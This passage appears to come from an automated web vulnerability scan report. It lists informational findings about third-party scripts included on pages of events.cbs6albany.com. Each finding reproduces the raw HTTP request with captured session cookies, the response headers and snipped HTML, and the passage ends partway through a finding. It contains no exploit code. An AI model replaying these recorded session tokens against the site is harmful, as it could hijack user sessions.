Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 344
ETag: "4c5b52a83abb45550584fcfcf102d749"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:31 GMT; HttpOnly
Content-Length: 56698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.167. http://events.cbs6albany.com/albany-ny/events/show/163514785-2011-valentine-expo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/show/163514785-2011-valentine-expo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/show/163514785-2011-valentine-expo HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:31:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 484
ETag: "707372889a4a6e4e8ce0d1d81c386157"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:31:25 GMT; HttpOnly
Content-Length: 42035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.168. http://events.cbs6albany.com/albany-ny/events/show/163938585-the-joy-formidable

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/show/163938585-the-joy-formidable

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/show/163938585-the-joy-formidable HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:30:55 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 196
ETag: "d2556ba10df3df80d010b58955007419"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:30:55 GMT; HttpOnly
Content-Length: 42606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.169. http://events.cbs6albany.com/albany-ny/events/sports+outdoors

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/sports+outdoors

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/sports+outdoors HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:34:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 517
ETag: "214b74f974b60cb13b57a5920e79abca"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:34:44 GMT; HttpOnly
Content-Length: 34568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.170. http://events.cbs6albany.com/albany-ny/events/visual+arts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/visual+arts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/visual+arts HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:34:42 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 324
ETag: "d00c19019c4d47e4446c60ba22f19c09"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:34:42 GMT; HttpOnly
Content-Length: 24687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.171. http://events.cbs6albany.com/albany-ny/movies

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/movies

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/movies HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:07 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 32
ETag: "f5f1ed3b3227c18003d62913420cc710"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:07 GMT; HttpOnly
Content-Length: 32431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.172. http://events.cbs6albany.com/albany-ny/performers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/performers

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/performers HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 34
ETag: "a55c0c6ab44c0027bf134112a42b56f8"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:08 GMT; HttpOnly
Content-Length: 33652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.173. http://events.cbs6albany.com/albany-ny/restaurants

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/restaurants

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/restaurants HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
